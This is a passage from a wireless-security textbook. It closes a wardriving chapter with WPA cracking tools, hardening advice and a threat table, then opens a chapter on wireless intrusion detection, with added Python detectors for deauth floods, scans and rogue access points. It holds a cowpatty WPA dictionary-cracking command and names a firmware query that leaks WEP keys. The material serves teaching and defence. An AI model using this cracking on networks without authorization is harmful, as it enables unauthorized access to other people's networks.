Lastly, another interesting tool (even if quite slow) is cowpatty. In order to crack a WPA key with cowpatty, you will use the tool like:

    Mud:Luca$ ./cowpatty -f Dictionary -r theTrafficFile -s wpa

where ./cowpatty launches the software, -f specifies the dictionary (a file called Dictionary in this example), -r specifies where the traffic dump is located (theTrafficFile here) and -s wpa tells the program to crack against WPA.

Concluding, if a proper handshake is collected, with the aforementioned tools it is possible to crack WPA. As shown, the steps are not complex. Then, it is possible to understand the importance of the password, since it is the only barrier preventing your network from being cracked.

Some Thoughts About the Wardrivers Community

In the following subsections, some ideas on why the wardriving community deserves attention are presented. Besides, always remember that many flaws of WEP arose due to the fact that it was developed without any “open” review.

Monitor the Internet Community

The Internet community does not only produce tools, but also important information regarding concepts of security and wardriving. Three major resources are suggested for periodic surveys:

1. Wardriving sites that publish the location of a network (that could be precisely located, as explained in Section I by using a GPS);



   a smart step could be to investigate sites publishing WLANs, in order to discover if yours has been detected and cracked.
2. Check for (almost weekly) security bulletins (e.g., BugTraq). Gear is composed not only of hardware, but also of software (e.g., the firmware) that could have vulnerabilities. For instance, one of the most famous was related to an AP that, upon receiving a broadcast user datagram protocol (UDP) packet on port 27155 containing the string “getsearch”, returned (in clear) the WEP keys, the MAC filtering database and the admin password (a big prize, indeed).
3. Periodically download and try the tools. It is useful, fun, and gives an idea of the activity of the underground community.

Avoid Default Configurations (Always)

It is widely known that default configurations are most of the time fine for normal users, but not particularly tweaked for security. For instance, in the Wireless Power section we discussed some possible risks arising when too much transmission power is employed. Besides, another threat lies in default names for the SSID, which can be employed to uncloak a hidden network, even without special tools. For instance, it is well known that many Cisco APs use “tsunami” as default SSID, and that Linksys uses “linksys.” In any case, it is possible to retrieve them by performing a simple Web search (moreover, it is possible to retrieve SSID naming schemas for hotels, retailers, and popular Internet cafés…). Lastly, a good suggestion is to also change the default password of your gear, since a malicious attacker (that normally is not a wardriver, but a vandal) can try to alter the AP configuration.

Browse the Source and Use the Tools

Owing to the availability of the tools, it is a better idea to try to be a wardriver sometimes, in order to test your own set-up, as well as the configuration made by your users (e.g., students, colleagues, or customers). Besides, studying the tools and collecting the traces is mandatory to discover possible attacks, for instance by recognizing unusual probes or excessive de-association requests.

Do Not Rely on Weak Passwords

As explained in the previous section, bruteforcing a WLAN will always be possible. WEP makes bruteforcing useless (owing to its flaws), but WPA-PSK can only be exploited by using a dictionary attack. Hence, the strength of your WLAN depends on the password. Use a good policy to create and distribute passwords and change them often. Do not forget that hundreds of people collaborate to produce dictionaries with the most popular passwords, including the most disparate ones (and also in leet variant – l33t v4r1aNt).

Tools

NetStumbler (www.netstumbler.com): NetStumbler is a program for the Windows™ operating system allowing to detect WLANs. It is a quite handy tool for locating WLANs, but it does not have all the features and the flexibility of the Aircrack-ng suite.

Kismet (www.kismetwireless.net): Kismet allows monitoring and sniffing traffic over a WLAN. In addition, it can also be adopted as an intrusion detection system. Kismet is able to identify networks both in active and passive mode. Besides, it also offers many other features, such as BSSID uncloaking. Kismet supports many wireless cards and many OSs, as well as many CPUs (e.g., x86, ARM, PPC, and X-Scale); however, some features are only available on the Linux-x86 version.

KisMAC (http://KisMAC.de/): KisMAC is the counterpart of Kismet, but it runs natively on Mac OS X and it is easy to use, owing to its simple GUI.

Aircrack-ng (http://www.aircrack-ng.org): Aircrack-ng is a comprehensive suite of tools, ranging from analyzers, sniffers, and cracking tools. Sources and scripts are available, promoting aircrack-ng as one of the best tools and a starting



point for developing automated (e.g., cron-driven) or tweaked wardriving tools.

Summary Table About Wardriving Attacks

In this section, we summarize many security threats deriving from wardrivers’ activity, by offering a comprehensive table. In addition, we will also introduce some “security risks” in order to better calibrate the needed countermeasures. Security risks have been quantified on a range varying from 0 (none) to 10 (severe). However, the more security is employed in the WLAN, the better. But, wardriving being tightly mixed with people’s habits and urban culture, the exposure to risks may vary according to where the WLAN is placed. Table 3 contains the summary.

Table 3. Summary of wardriving threats and possible countermeasures

| Attack / Detected Anomaly | Skills Needed | WLAN Affected | Security Risk | Countermeasures |
|---|---|---|---|---|
| SSID uncloak | None. Automatically done in several software. | ALL | 1 | None at this level. Forecasted in the standard. |
| Active scan | None. Automatically done by interfaces’ drivers. | ALL | 0 | Check periodically MAC addresses of traffic flows. |
| Passive scan | None, but proper software and a proper interface are needed. | ALL | 2 | Reduce the transmission power. |
| WEP crack | Minimum | If WEP protected | 10 | Avoid WEP. If WEP must be in place (for legacy support), change password often. Monitor traffic to detect peaks and activate MAC filtering (at least). Force users to adopt VPN and disable DHCP. |
| MAC spoofing | Medium. Kernel patches could be needed. | ALL | 8 | MAC-based policies must be adopted jointly with encryption techniques. |
| Packet injection | Medium. | If WEP protected | 5 | Tools for performing packet injection can also monitor the WLAN like an IDS. The attacker could be “serious.” |
| De-authentication flood | Medium | For WPA | 7 | Change the WPA password to avoid a dictionary attack. |
| Unsolicited traffic in indoor environments | Medium/High | ALL | 9 | When in presence of limited transmitting power, the attacker relies on high gain antennas, thus could be a prepared attacker. |
| Unrecognized | High | ALL | 10 | It could be a “false positive” or the attacker could be able to produce his/her own tools. |
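The following detector, added here as an example and not code from the chapter, implements three of the checks in Table 3 (the active scan, de-authentication flood and MAC-addresses-of-traffic-flows rows) over constructed 802.11 management-frame log lines; the log format, the thresholds and every MAC address are assumptions.

```python
"""Detection logic for three rows of Table 3 (active scan, de-authentication
flood, MAC addresses of traffic flows), run over constructed 802.11
management-frame log lines.

Added example, not code from the chapter: the log format, the thresholds
and every MAC address are constructed assumptions.
"""
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple

AP_MAC = "00:11:22:33:44:55"                       # the authorized AP
AUTHORIZED_CLIENTS = {"aa:bb:cc:00:00:01", "aa:bb:cc:00:00:02"}
WINDOW_S = 1.0      # sliding window length in seconds
DEAUTH_LIMIT = 5    # more deauth frames than this per window = flood
PROBE_LIMIT = 3     # more broadcast probe requests than this per window = scan

# Constructed log: one frame per line, "t=<s> type=<kind> src=<mac> dst=<mac>".
SAMPLE_LOG = """\
t=0.10 type=beacon    src=00:11:22:33:44:55 dst=ff:ff:ff:ff:ff:ff
t=0.50 type=data      src=aa:bb:cc:00:00:01 dst=00:11:22:33:44:55
t=0.80 type=data      src=aa:bb:cc:00:00:02 dst=00:11:22:33:44:55
t=1.00 type=probe_req src=de:ad:be:ef:00:01 dst=ff:ff:ff:ff:ff:ff
t=1.05 type=probe_req src=de:ad:be:ef:00:01 dst=ff:ff:ff:ff:ff:ff
t=1.10 type=probe_req src=de:ad:be:ef:00:01 dst=ff:ff:ff:ff:ff:ff
t=1.15 type=probe_req src=de:ad:be:ef:00:01 dst=ff:ff:ff:ff:ff:ff
t=2.00 type=probe_req src=aa:bb:cc:00:00:02 dst=ff:ff:ff:ff:ff:ff
t=5.00 type=deauth    src=00:11:22:33:44:55 dst=ff:ff:ff:ff:ff:ff
t=5.10 type=deauth    src=00:11:22:33:44:55 dst=ff:ff:ff:ff:ff:ff
t=5.20 type=deauth    src=00:11:22:33:44:55 dst=ff:ff:ff:ff:ff:ff
t=5.30 type=deauth    src=00:11:22:33:44:55 dst=ff:ff:ff:ff:ff:ff
t=5.40 type=deauth    src=00:11:22:33:44:55 dst=ff:ff:ff:ff:ff:ff
t=5.50 type=deauth    src=00:11:22:33:44:55 dst=ff:ff:ff:ff:ff:ff
t=5.60 type=deauth    src=00:11:22:33:44:55 dst=ff:ff:ff:ff:ff:ff
t=6.00 type=data      src=ca:fe:00:00:00:09 dst=00:11:22:33:44:55
t=20.0 type=deauth    src=00:11:22:33:44:55 dst=aa:bb:cc:00:00:01
"""

LINE_RE = re.compile(
    r"t=(?P<t>[\d.]+)\s+type=(?P<type>\w+)\s+"
    r"src=(?P<src>[0-9a-f:]{17})\s+dst=(?P<dst>[0-9a-f:]{17})"
)

Frame = Tuple[float, str, str, str]


def parse(log: str) -> List[Frame]:
    """Parse the constructed log; lines that do not match are skipped."""
    frames = []
    for line in log.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            frames.append((float(m["t"]), m["type"], m["src"], m["dst"]))
    return frames


def burst_sources(frames: List[Frame], ftype: str, limit: int) -> Set[str]:
    """Sources that sent more than `limit` frames of `ftype` inside any
    WINDOW_S-second sliding window (a "peak", in the words of Table 3)."""
    times: Dict[str, List[float]] = defaultdict(list)
    for t, typ, src, _dst in frames:
        if typ == ftype:
            times[src].append(t)
    flagged = set()
    for src, ts in times.items():
        ts.sort()
        start = 0
        for end, t in enumerate(ts):
            while t - ts[start] > WINDOW_S:
                start += 1
            if end - start + 1 > limit:
                flagged.add(src)
                break
    return flagged


def analyze(log: str) -> Dict[str, List[str]]:
    frames = parse(log)
    return {
        # A burst of deauth frames carrying the AP's address: one deauth
        # (see t=20.0) is normal operation, a burst is a flood.
        "deauth_flood": sorted(burst_sources(frames, "deauth", DEAUTH_LIMIT)),
        # A burst of broadcast probe requests from one station: active scan.
        "active_scan": sorted(burst_sources(frames, "probe_req", PROBE_LIMIT)),
        # Data flows towards the AP from MACs outside the authorized list.
        "unknown_clients": sorted({
            src for _t, typ, src, dst in frames
            if typ == "data" and dst == AP_MAC and src not in AUTHORIZED_CLIENTS
        }),
    }


if __name__ == "__main__":
    for name, macs in analyze(SAMPLE_LOG).items():
        print(f"{name}: {macs or 'none'}")
```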



Conclusion

In this chapter we introduced the concept of wardriving, and practices related to cracking wireless networks. As explained, cracking a WLAN is not a complex task: then, for your security, you should rely on other techniques (e.g., RADIUS). In addition, by using the examples, it is possible to produce your own penetration tests, as well as exercises to show some real world attacks to students and engineers.

Acknowledgment

The author wishes to thank Prof. Franco Davoli for the technical suggestions and the thorough review, and Eng. Sergio Bellisario for the technical review.

Key Terms

Active Mode: Active mode is an operative mode where scanning is done via probe packets. As a consequence, the scanner does not remain undetected.

MAC Address Filtering: MAC address filtering is a technique that allows/denies network access only for a predefined set of MAC addresses.

MAC Spoofing: MAC spoofing is changing the MAC of the L2 interface. Typically it is employed to by-pass MAC address filtering.

Packet Injection: Packet injection is the activity of inserting a packet in a network for some purpose. For instance, when attacking a WEP-protected network, to stimulate the traffic production to get more data to be analyzed.

rfmon: rfmon is an operative mode of IEEE 802.11-based air interfaces, allowing to scan for access points while remaining undetectable, since the card does not send any probe packets.

Wardriving: Wardriving is the activity of “driving around, looking for wireless networks.”

Wired Equivalent Privacy (WEP): WEP is an encryption mechanism with many security flaws. Recognized as a real security issue, it has been replaced by Wi-Fi protected access (WPA).

Endnotes

1. However, if raw frames are supported by the internal chipset, you can always build your own tools and enabling drivers by investigating the data-sheets.
2. Many OSes or firmware clear the ARP cache upon disconnection. Then, it could be useful to use a more “aggressive” strategy, as suggested in the aircrack documentation.




Chapter VI
Intrusion and Anomaly
Detection in Wireless Networks
Amel Meddeb Makhlouf
University of the 7th of November at Carthage, Tunisia

Noureddine Boudriga
University of the 7th of November at Carthage, Tunisia

Abstract

The broadcast nature of wireless networks and the mobility features created new kinds of intrusions and anomalies taking profit of wireless vulnerabilities. Because of the radio links and the features of wireless networks, wireless intrusions are more complex because they add, to the intrusions developed for wired networks, a large spectrum of complex attacks targeting the wireless environment. These intrusions include rogue or unauthorized access points (AP), MAC spoofing, and wireless denial of service, and require adding new techniques and mechanisms to those approaches detecting intrusions targeting wired networks. To face this challenge, some researchers focused on extending the deployed approaches for wired networks while others worked to develop techniques suitable for detecting wireless intrusions. The efforts have mainly addressed: (1) the development of theories to allow reasoning about detection, wireless cooperation, and response to incidents; and (2) the development of wireless intrusion and anomaly detection systems that incorporate wireless detection, preventive mechanisms and tolerance functions. This chapter aims at discussing the major theories, models, and mechanisms developed for the protection of wireless networks/systems against threats, intrusions, and anomalous behaviors. The objectives of this chapter are to: (1) discuss security problems in a wireless environment; (2) present the current research activities; (3) study the important results already developed by researchers; and (4) discuss the validation methods proposed for the protection of wireless networks against attacks.

Introduction

Wireless has opened a new and exciting area for research. Its technology is advancing and changing every day. However, the biggest concern with wireless has been security. For some period of time, wireless has seen very limited security on the wide open medium. Along with improved encryption schemes, a new solution helping the problem resolution is the wireless intrusion detection system (WIDS). It is a network component aiming at protecting the network by detecting wireless attacks, which target wireless networks having specific features and characteristics. Wireless intrusions

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.
can belong to two categories of attacks. The first category targets the fixed part of the wireless network, such as MAC spoofing, IP spoofing, and denial of service (DoS); and the second category targets the radio part of the wireless network, such as the rogue access point (AP), noise flooding, and wireless network sniffing. The latter attacks are more complex because they are hard to detect and to trace back.

To detect such complex attacks, the WIDS deploys approaches and techniques provided by intrusion detection systems (IDS) protecting wired networks. Among these approaches, one can find the signature-based and anomaly-based approaches. The first approach consists in matching users’ patterns with stored attack patterns (or signatures). The second approach aims at detecting any deviation from the “normal” behavior of the network entities. The deployment of the aforementioned approaches in a wireless environment requires some modifications. The signature-based approach in wireless networks may require the use of a knowledge base containing the wireless attack signatures, while an anomaly-based approach requires the definition of profiles specific to wireless entities (mobile users and APs). Recently, efforts have focused on wireless intrusion detection to increase the efficiency of WIDS. Based on these efforts, models and architectures have been discussed in several research works.

The objective of this chapter is to discuss the major research developments in wireless intrusion detection techniques, models, and proposed architectures. Mainly, the chapter will: (1) discuss security problems in wireless environments; (2) present current research activities; (3) study important results already developed; and (4) discuss validation methods proposed for WIDS. The remaining part is organized as follows: The next section discusses vulnerabilities, threats, and attacks in wireless networks. The third section presents wireless intrusion and anomaly detection approaches. The fourth section introduces models proposed for detecting wireless intrusions. The fifth section presents WIDS architectures proposed by research papers. The sixth section presents the wireless distributed schemes for intrusion detection. The seventh section discusses mechanisms of prevention and tolerance provided to enhance wireless intrusion detection. Finally, the last section concludes the chapter.

Vulnerabilities, Threats, and Attacks in Wireless Networks

To present vulnerabilities, threats, and attacks targeting wireless networks, we have to discuss first the security requirements of wireless systems, including those concerning security policy. This section presents the concepts of wireless intrusion, anomaly, and attack scenario in wireless networks, in order to highlight intrusion and anomaly detection requirements. In particular, it discusses some attacks and attack classifications that make security in wireless systems very special.

Security Requirements in Wireless Environments

Securing a communication channel should satisfy at least the following set of requirements: integrity, confidentiality, and availability. Moreover, wireless communications require authentication of the sender and/or the receiver and techniques that guarantee non-repudiation. In the following, we discuss technical security and security policy requirements which help reduce vulnerabilities and attack damages.

Because of their technical architecture, mobile communications are targets for a large set of threats and attacks that occur in wired networks, such as identity spoofing, authorization violations, data loss, modified and falsified data units, and repudiation of communication processes. Additionally, new security requirements and additional measures for wireless networks have to be added to the security requirements of wired networks (Schäfer, 2003). Vulnerabilities, threats, and attacks existing in wireless networks represent a greater potential risk for wireless networks. One among the technical requirements is the enforcement of security of the wireless links, because of the ease of gaining direct physical access. Moreover, new difficulties



can arise in providing wireless security services. For example, the authentication of a mobile device has to be verified by (or for) all APs (or base stations [BS]) under which the mobile changes its localization. Because of the handover, the respective entities cannot be determined in advance, so the key management process is more complicated. Also, the difference with wired networks, in terms of confidentiality of mobile device location, reveals a number of threats against mobile communications. This appears because of the following conflict: on one hand, each mobile should be reachable for incoming communication requests while, on the other hand, any network entity should be able to get the current location of a mobile device in the network (Schäfer, 2003).

Wireless Vulnerabilities and Threats

A vulnerability is a weakness (or fault) in the communication medium or a protocol that allows compromising the security of the network component. Most of the existing vulnerabilities in the wireless medium are caused by the medium itself.  Because transmissions are broadcast, they are easily available to anyone who has the appropriate equipment. Particular threats of wireless communication are device theft, malicious hackers, malicious code, theft of service, and espionage (Boncella, 2006). There are numerous wireless vulnerabilities and threats that are studied in the literature, for the purpose of detecting attacks exploiting them. In the following, we distinguish two categories of vulnerabilities and threats: those existing in LAN-like wireless networks (WLAN) and those existing in cellular-like wireless networks (Hutchison, 2004).

WLAN Vulnerabilities and Threats

The following are typical vulnerabilities existing in the main component of a WLAN, which is the AP.

• Signal range of an authorized AP: This vulnerability is about the possibility of the extension of the AP signal strength beyond a given perimeter. Consequently, the AP’s placement and signal strength have to be adapted to make sure that the transmitting coverage is just enough to cover the correct area.
• Physical security of an authorized AP: Because most APs are mounted by default, their placement is critical. An AP has to be correctly placed in order to avoid accidental damage, such as direct access to the physical network cable. To physically protect the access to the AP, many solutions were proposed; but all of them require a mandatory policy.
• Rogue AP: This vulnerability is a sort of man-in-the-middle attack, where an attacker can place an unauthorized (or rogue) AP on the network and configure it to look legitimate to gain access to wireless users’ sensitive data. This can be done because users’ devices need to be connected to the strongest available AP signal.
• The easy installation and use of an AP: In order to use the advantages of internal networks, employees can introduce an unauthorized wireless network. The easy installation and configuration of the AP make this feasible for legitimate or illegitimate users.
• The AP configuration: If the AP is poorly configured or unauthorized, then it can provide an open door to hackers. This is caused by using a default configuration that annihilates the security controls and encryption mechanisms.
• Protocol weaknesses and capacity limits on authorized APs: These limitations can cause DoS from hackers using unauthorized APs when they can flood authorized APs with traffic, forcing them to reboot or deny accesses.

Some of the attacks exploiting the aforementioned vulnerabilities are discussed in the following section of this chapter.
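An inventory-based audit of observed beacons, added here as an example and not code from the chapter, that flags the AP-related weaknesses listed above (a rogue AP advertising a legitimate SSID, an employee-installed AP, a default or drifted configuration, and a signal audible outside the perimeter); the inventory, the beacon observations and the RSSI threshold are constructed assumptions.

```python
"""Audit observed beacons against an inventory of authorized APs, to spot
the AP-related weaknesses listed above (rogue AP, unauthorized AP, default
or changed configuration, signal leaking outside the perimeter).

Added example, not code from the chapter: the inventory, the beacons and
the RSSI threshold are constructed assumptions.
"""
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class Beacon:
    ssid: str
    bssid: str
    channel: int
    privacy: bool   # True when the beacon advertises encryption
    rssi_dbm: int   # as heard by a sensor placed just outside the perimeter


# Constructed inventory of authorized APs: BSSID -> (SSID, channel).
INVENTORY: Dict[str, Tuple[str, int]] = {
    "00:11:22:33:44:55": ("corp-wlan", 6),
    "00:11:22:33:44:66": ("corp-wlan", 11),
}
AUTHORIZED_SSIDS = {ssid for ssid, _ch in INVENTORY.values()}
DEFAULT_SSIDS = {"tsunami", "linksys", "default"}   # factory names
PERIMETER_RSSI_DBM = -75   # assumption: louder than this outside = range leak


def classify(b: Beacon) -> List[str]:
    """Return the findings for one beacon (empty list = nothing to report)."""
    findings: List[str] = []
    known = INVENTORY.get(b.bssid)
    if known is None:
        if b.ssid in AUTHORIZED_SSIDS:
            # A BSSID we do not own is advertising our SSID: the rogue AP
            # "configured to look legitimate" described in the text.
            findings.append("rogue AP: unknown BSSID advertising an authorized SSID")
        else:
            findings.append("unauthorized AP: SSID not in inventory")
        if b.ssid.lower() in DEFAULT_SSIDS:
            findings.append("default SSID: AP left in factory configuration")
        return findings
    ssid, channel = known
    if b.ssid != ssid or b.channel != channel:
        findings.append("configuration drift: SSID or channel differs from inventory")
    if not b.privacy:
        findings.append("open network: authorized AP advertises no encryption")
    if b.rssi_dbm > PERIMETER_RSSI_DBM:
        findings.append("signal range: authorized AP audible outside the perimeter")
    return findings


def audit(beacons: List[Beacon]) -> Dict[str, List[str]]:
    """Map each observed BSSID to its findings, keeping only those with any."""
    result: Dict[str, List[str]] = {}
    for b in beacons:
        found = classify(b)
        if found:
            result[b.bssid] = found
    return result


# Constructed observations from one sensor sweep outside the building.
SAMPLE_BEACONS = [
    Beacon("corp-wlan", "00:11:22:33:44:55", 6, True, -82),    # fine
    Beacon("corp-wlan", "00:11:22:33:44:66", 1, True, -60),    # channel + range
    Beacon("corp-wlan", "66:55:44:33:22:11", 6, True, -50),    # rogue
    Beacon("linksys", "00:1a:2b:3c:4d:5e", 11, False, -70),    # employee AP
]

if __name__ == "__main__":
    for bssid, findings in audit(SAMPLE_BEACONS).items():
        print(bssid, "->", "; ".join(findings))
```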


Cellular System Vulnerabilities and Threats

This subsection presents cellular system vulnerabilities and threats that are categorized as follows (Nichols & Lekkas, 2002):

• Service interruption: The increased capacity provided by high-speed technology has resulted in fewer cable routes necessary to meet capacity requirements. Consequently, this has decreased the number of switches. The lack of overall diversity in cabling and switching has increased the vulnerability of telecommunication infrastructures. This can cause DoS of an entire zone.
• Natural threats: Natural threats comprise the category of repeated threats caused by climatic, geological, or seismic events. Severe damage resulting from natural disasters can cause long-term damage to the telecommunication infrastructures.
• Handset vulnerabilities: Unlike computer systems, handsets are limited regarding security features. Because wireless messages travel through the air before passing to a conventional wired network for transmission to the receiver, messages may need to be changed to another protocol (e.g., at the gateway, the wireless transport layer security message has to be changed to Secure Socket Layer). This operation presents a vulnerability because anyone can access the network at this moment. Moreover, the use of encryption can add vulnerabilities, which can cause confusion between mobile phones, since the node does not know its encrypted true location.

Wireless Attacks

Detecting a large set of attacks by a WIDS requires studying and developing the attacker’s methods and strategies. We discuss in this subsection the typical attacks and malicious events that can be detected by a WIDS (Hiltunen, 2004; Vladimirov, Gavrilenko, & Mikhailovsky, 2004).

Illicit Use

Illicit use of a wireless network may involve an attacker connecting to the Internet or to the corporate network that lives behind the AP. Illicit use is a passive attack that does not cause damage to the physical network. It includes the following attacks (Mateli, 2006):

• Wireless network sniffing: When wireless packets traverse the air, attackers equipped with appropriate devices and software can capture them. Sniffing attack methods include:
  ° Passive scanning: This attack aims at listening to each channel. It can be done without sending information. For example, some radio frequency monitors can allow copying frames on a channel.
  ° Service set identifier (SSID) detection: This consists in retrieving the SSID by scanning frames of the following types: beacon, probe requests, probe responses, association requests, and re-association requests.
  ° MAC addresses collecting: To construct spoofed frames, the attacker has to collect legitimate MAC addresses, which can be used for accessing an AP that filters out frames with non-registered MAC addresses.

To capture wireless packets, specific equipment should be used by the attackers, depending on the targeted wireless network interface card (Low, 2005).

• Probing and network discovery: This attack aims to identify various wireless targets. It uses two forms of probing: active and passive. Active probing involves the attacker actively sending probe requests with no identification using the SSID configured in order to solicit a probe response with SSID information and



other information from any active AP. When an attacker uses passive probing, he is listening on all channels for all wireless packets, thus the detection capability is not limited by the transmission power (Low, 2005).
• Inspection: The attacker can inspect network information using tools like Kismet and Airodump (Low, 2005). He could identify MAC addresses, IP address ranges, and gateways.

Wireless Spoofing

The purpose of spoofing is to modify identification parameters in data packets. New values of selected parameters can be collected by sniffing. Typical spoofing attacks include:

• MAC address spoofing: MAC spoofing aims at changing the attacker’s MAC address to a legitimate MAC address. This attack is easy to launch because some client-side software allows the user to view their MAC addresses.
• IP spoofing: IP spoofing attempts to change source or destination IP addresses by talking directly with the network device. IP spoofing is used by many attacks. For example, an attacker can spoof the IP address of host A by sending a spoofed packet to host B announcing a window size equal to 0, though it originated from B (Mateli, 2006).
• Frame spoofing: The attacker injects frames having the 802.11 specification with spoofed contents. Due to the lack of authentication, spoofed frames cannot be detected.

Man in the Middle Attacks

This attack attempts to insert the attacker in the middle (man in the middle [MITM]) of a communication for purposes of intercepting clients’ data and modifying them before discarding them or sending them out to the real destination. To perform this attack, two steps have to be accomplished. First, the legitimate AP serving the client must be brought down to create a “difficult to connect” scenario. Second, the attacker must set up an alternate rogue AP with the same credentials as the original for purposes of allowing the client to connect to it. Two main forms of MITM exist: eavesdropping and manipulation. Eavesdropping can be done by receiving radio waves on the wireless network, which may require a sensitive antenna. Manipulation requires not only having the ability to receive the victim’s data but then being able to retransmit the data after changing it.

Denial of Service Attacks

DoS attacks can target different network layers as explained in the following:

• Application layer: DoS occurs when a large amount of legitimate requests are sent. It aims to prevent other users from accessing the service by forcing the server to respond to a large number of request transactions.
• Transport layer: DoS is performed when many connection requests are sent. It targets the operating system of the victim’s computer. The typical attack in this case is a SYN flooding.
• Network layer: DoS succeeds if the network allows to associate clients. In this case, an attacker can flood the network with traffic to deny access to other devices. This attack could consist of the following tasks:
  ° The malicious node participates in a route but simply drops several data packets. This causes the deterioration of the connection (Gupta, Krishnamurthy, & Faloutsos, 2002).
  ° The malicious node transmits falsified route updates or replays stale updates. These might cause route failures, thereby deteriorating performance.
  ° The malicious node reduces the time-to-live (TTL) field in the IP header so that packets never reach their destinations.
• Data link layer: DoS targeting the link layer can be performed as follows:



  ° Since we assume that there is a single channel that is reused, keeping the channel busy in the node leads to a DoS attack at that node.
  ° By using a particular node to continually relay spurious data, the battery life of that node may be drained. An end-to-end authentication may prevent these attacks from being launched.
• Physical layer: This kind of DoS can be executed by emitting a very strong RF interference on the operating channel. This will cause interference to all wireless networks that are operating at or near that channel.

Wireless Intrusion and Anomaly Detection

This section discusses the major security solutions provided for wireless networks. In particular, the cases of WLAN and ad hoc networks will be addressed. The discussed methods include radio frequency fingerprinting, cluster-based detection, mobile devices monitoring, and mobile profile construction.

Basic Techniques for Detection

Wireless intrusion detection protects wireless networks against attacks by monitoring traffic and generating alerts. Two ways of detection are distinguished: signature based and anomaly based. The first category aims at detecting known attacks by looking for their signatures. The main disadvantage of such approaches is that they detect only known attacks. The anomaly based approaches are not often implemented, mostly because of the high amount of false alarms that have to be managed, losing a large amount of time. Anomaly based detection develops a baseline of what is considered normal traffic. When abnormal traffic is detected, an alert is generated. The advantage of such an approach is that it can capture unknown attacks.

To take advantage of the previous two approaches, the hybrid approach consists in using the two approaches simultaneously in the same system. To be efficient, intrusion detection approaches have to be run online and in real time. Otherwise, the use of an intrusion detection technique is useful for audit or post-mortem digital investigation, and it will not prevent an attack in time. Real-time intrusion detection has to be able to collect data from the network in order to store, analyze and correlate them, which can decrease network performance (Hutchison, 2004).

Wireless Detection Approaches

The main objective of wireless detection is to protect the wireless network by detecting any deviation with respect to the security policy. This can be done by monitoring the active components of the wireless network, such as the APs (Hutchison, 2004). Generally, the WIDS is designed to monitor and report on network activities between communicating devices. To do this, the WIDS has to capture and decode wireless network traffic. While some WIDSs can only capture and store wireless traffic, other WIDSs can analyze traffic and generate reports. Other WIDSs are able to analyze signal fingerprints, which can be useful in detecting and tracking rogue AP attacks. As is done for wired networks, the following classifications of IDSs can be distinguished according to several dimensions: the approach (signature based/anomaly based); the monitored system (network-based/host-based); and the way of response (active/passive).

Mobile Profiles Construction

The main objectives when using the anomaly based approach are to define user mobility profiles (UMPs) and design an appropriate system that permits the detection of any deviation with respect to the UMP. The intrusion detection process begins with the data collection processing. Once the user location coordinates (LCs) are determined, a high-level mapping (HLM) is applied. The objective of the HLM is to decrease the granularity of the data in order to accommodate minor deviations or intra-user variability between successive location broadcasts. LC features are extracted from each


Intrusion and Anomaly Detection in Wireless Networks

broadcast during feature extraction. A set of these chronologically ordered LCs is subsequently concatenated to define a mobility sequence (Hall, Barbeau, & Kranakis, 2005). This process continues until the creation of the mobility sequences. The training patterns from the first four of the six data set partitions are stored in the UMP, along with other user-related information. During the classification phase, a set of user mobility sequences are observed and compared to the training patterns in the user's profile to evaluate the similarity measure to profile (SMP) parameter. If the average SMP value exceeds predefined thresholds, then the mobility sequences are considered abnormal and an alert is generated (Hall et al., 2005).

The following parameters are defined for the mobility profiles: (1) the identifier representing the user identification; (2) the training patterns characterizing the user mobility behavior; (3) the window size representing the mobility sequence numbers (SN).

Monitoring Wireless Devices

Using a signature-based approach, the IDS bases its processing on the recognition of intrusion patterns from the traffic outputs. This requires monitoring several parameters of the AP outputs and the wireless client. Monitoring APs is about monitoring their respective SSID, MAC address, and channel information. This requires listening to wireless frames, such as beacons, probe responses, and authentication/association frames, at the AP outputs and comparing them to the predefined attack signatures. For example, in the case of a MITM attack, the monitoring process would detect the sudden introduction of an AP on another channel previously not present. The SSID and MAC address, though, might be spoofed by the attacker in the process of setting up the rogue AP.

Because authorized clients cannot be listed, the information that may help in detecting an attack cannot be totally available; nevertheless, the following aspects can be monitored (Low, 2005):
• The "blacklist" of wireless clients can be checked against all connecting clients. Any client within this list trying to access the network would be automatically denied and an alert can be sent off.
• All wireless clients with an "illegal" MAC address (MAC address ranges which have not been allocated) are automatically denied access and an alert is sent off.
• A wireless client that just sends out probe requests, or special distinguishable data packets after the initial probe request, and has not been authenticated can be flagged as a potential network discovery attack.
• Usually, when impersonation attacks are ongoing, the attacker will take on the MAC/IP address of the victim, but it will not be able to continue with the SN used previously by the victim. Thus, by monitoring the SN in these packets, potential impersonators could be identified.

Radio Frequency Fingerprinting (RFF)

RFF is defined as the process of identifying a cellular phone by the unique "fingerprint" that characterizes its signal transmission. It is used to prevent cloning fraud, because a cloned phone will not have the same fingerprint as the legal phone with the same electronic identification number. This approach aims to enhance anomaly based wireless intrusion detection by associating a MAC address with the corresponding transceiver profile. The architecture of the corresponding IDS is shown in Figure 1, where the main objective is to classify an observed transceiver print as normal (belongs to the transceiver of a device with a given MAC address) or anomalous (belongs to another transceiver) (Barbeau, Hall, & Kranakis, 2006; Hall et al., 2005).

As illustrated in Figure 1, the information flow begins by converting the analog signal to a digital signal. This is done by the converter component. Second, the transient extractor extracts the transient portion from the digital signal. Then, the amplitude, phase, and frequency defining the transceiver print are extracted by the feature extraction component. These features are compared to the transceiver profiles existing in the IDS. This operation is performed by the classifier component.
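The feature-extraction and profile-matching flow just described, carried through as an added example (not the chapter's or the cited authors' code): amplitude and phase are computed from I/Q samples as in equations (1) and (2) of the next subsection, a Gaussian score per feature stands in for the statistical classifier, and a recursive Bayesian update plays the role of the Bayesian filter. The transient signal model, the feature set, the thresholds and the filter's error rates are assumptions; the MAC address and the sample prints are constructed.

```python
"""Transceiver-print matching: I/Q -> features -> profile comparison -> Bayesian filter."""
import math
from statistics import mean, pstdev

FEATURES = ("amp_dev", "phase_dev", "freq_mean", "i_dev", "q_dev")
MATCH_THRESHOLD = 0.1          # assumed: per-print score below this counts as "no match"

def _unwrap(phase):
    """Remove the 2*pi jumps of atan2 so the phase is continuous over the transient."""
    out = [phase[0]]
    for prev, cur in zip(phase, phase[1:]):
        step = cur - prev
        step -= 2 * math.pi * round(step / (2 * math.pi))
        out.append(out[-1] + step)
    return out

def extract_features(iq):
    """iq: list of (i, q) samples of the already-extracted transient portion."""
    amp = [math.sqrt(i * i + q * q) for i, q in iq]         # eq. (1)
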